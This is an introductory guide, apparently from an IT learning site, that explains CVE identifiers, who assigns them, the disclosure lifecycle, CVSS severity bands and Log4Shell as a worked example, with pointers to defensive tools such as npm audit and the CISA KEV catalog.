Every week, hundreds of security flaws are discovered in software you use every day — your browser, your VPN client, the server software behind your favourite websites. Without a standard way to name and track these flaws, the security world would be chaos. That is exactly what CVE solves.
This guide explains what CVE is, how a CVE ID works, who assigns them, and why understanding CVEs makes you a better IT professional.
What is a CVE?
CVE stands for Common Vulnerabilities and Exposures. It is a publicly available list of known security flaws — each one given a unique identifier so that security teams, software vendors, and researchers worldwide can talk about the exact same issue without confusion.
In simple terms: CVE is like a registry of every reported pothole on the internet. Each pothole gets a unique ID so everyone — from the driver who found it to the road crew fixing it — is talking about the same hole.
The CVE programme was launched in 1999 by MITRE Corporation, a US non-profit that manages it on behalf of the Department of Homeland Security. Today it contains over 250,000 entries and grows by tens of thousands each year.
How a CVE ID works
Every CVE has an identifier in this format: CVE-YEAR-NUMBER
- CVE — the programme prefix
- YEAR — the year the vulnerability was assigned (not necessarily discovered or disclosed)
- NUMBER — a unique sequence number, four or more digits
Example: CVE-2021-44228 is the identifier for Log4Shell, one of the most critical vulnerabilities in history — a flaw in the Apache Log4j logging library that allowed remote code execution on millions of servers.
The number itself carries no severity information. It is purely a label. Severity comes from a separate scoring system (CVSS — covered below).
When a vendor or security blog mentions a CVE ID, search it directly at nvd.nist.gov — the National Vulnerability Database. You will find the official description, severity score, affected software versions, and links to patches, all in one place.
Who assigns CVEs?
CVE IDs are not assigned by one central team. They are assigned by a network of approved organisations called CVE Numbering Authorities (CNAs).
CNAs include:
- Major vendors — Microsoft, Google, Apple, Red Hat, and hundreds of others can assign CVE IDs for vulnerabilities in their own products
- Bug bounty platforms — HackerOne and Bugcrowd can assign IDs for vulnerabilities reported through their programmes
- MITRE Corporation — acts as the CNA of last resort for anything that does not fall within another CNA's scope
A researcher who finds a vulnerability reports it to the relevant CNA. The CNA reviews it, assigns a CVE ID, and publishes a description once it is safe to do so (after a patch is released or a disclosure deadline passes).
The CVE lifecycle
A CVE does not appear overnight. It goes through several stages:
- Discovery — a researcher or vendor finds a flaw in software
- Private disclosure — the researcher reports it to the vendor (responsible disclosure) or directly to a CNA
- CVE reserved — the CNA reserves a CVE ID, which may appear as "RESERVED" in public databases while a fix is being developed
- Patch developed — the vendor builds and tests a fix
- Public disclosure — the CVE is published along with the patch; users are notified to update
- NVD enrichment — the National Vulnerability Database adds CVSS scores, affected versions, and references
The window between discovery and public disclosure is called the embargo period. It typically lasts 90 days — a standard set by Google's Project Zero — giving vendors time to patch before attackers learn about the flaw.
A real-world example: Log4Shell
On 9 December 2021, a security researcher disclosed CVE-2021-44228 — Log4Shell. The flaw was in Apache Log4j, a Java logging library used by thousands of enterprise applications including Amazon, Apple iCloud, Cloudflare, Steam, and countless others.
The vulnerability allowed an attacker to send a single crafted string in a log message — something as simple as a username field — and cause the server to download and execute malicious code from the internet. No authentication required.
Its CVSS score was CRITICAL 10.0 — the highest possible. Within 72 hours, attackers were scanning the entire internet for vulnerable servers. Security teams worldwide dropped everything to patch.
This is why CVEs matter: a single vulnerability in one widely-used library can expose millions of systems simultaneously.
CVE vs CVSS — what is the difference?
These two terms are often confused:
- CVE — the name (identifier) of a vulnerability. It tells you what the flaw is.
- CVSS (Common Vulnerability Scoring System) — the score (0.0–10.0) that measures how severe the flaw is, based on factors like exploitability, impact, and whether a patch exists.
Think of it this way: CVE is the name on the patient's file; CVSS is the triage score that tells the doctor how urgently to treat them.
Severity bands:
- Critical 9.0–10.0 — patch immediately
- High 7.0–8.9 — patch this week
- Medium 4.0–6.9 — patch in your next cycle
- Low 0.1–3.9 — monitor and patch when convenient
Why CVEs matter to you
Even if you are not a security researcher, CVEs affect your daily work:
- System administrators — patch management relies on CVE feeds. Tools like
apt,yum, and Windows Update reference CVEs when listing security updates. - Developers — libraries you include in your project may have known CVEs. Tools like
npm audit,pip-audit, and GitHub's Dependabot scan for them automatically. - IT managers — compliance frameworks (ISO 27001, SOC 2, PCI DSS) require you to track and remediate CVEs within defined timeframes.
- Everyone — when your browser or OS asks you to update, there is almost always a CVE fix involved.
Subscribe to the CISA Known Exploited Vulnerabilities (KEV) Catalog at cisa.gov/kev. It lists CVEs that are being actively exploited right now — these are the ones that need immediate attention, before attackers reach your systems.
Frequently asked questions
What does CVE stand for?
CVE stands for Common Vulnerabilities and Exposures. It is a standardised list of publicly known security flaws in software and hardware, maintained by MITRE Corporation.
Who assigns CVE IDs?
CVE IDs are assigned by CVE Numbering Authorities (CNAs) — approved organisations that include major vendors (Microsoft, Google, Apple), bug bounty platforms (HackerOne), and MITRE itself as the CNA of last resort.
Is every CVE dangerous?
No. CVEs are scored from 0–10 using CVSS. A score below 4 is low severity. Many CVEs have patches available before they are ever exploited in the wild. Focus your urgency on Critical and High scores, especially those appearing in the CISA KEV catalog.
How do I know if my software has a CVE?
Search the National Vulnerability Database at nvd.nist.gov by product name. For code dependencies, run npm audit (Node.js), pip-audit (Python), or enable Dependabot on GitHub to get automatic alerts.
Keep learning on ITVedas
Explore more CVE guides — CVSS scoring, zero-day vulnerabilities, and how to read a full CVE report.
Back to CVE Chapter →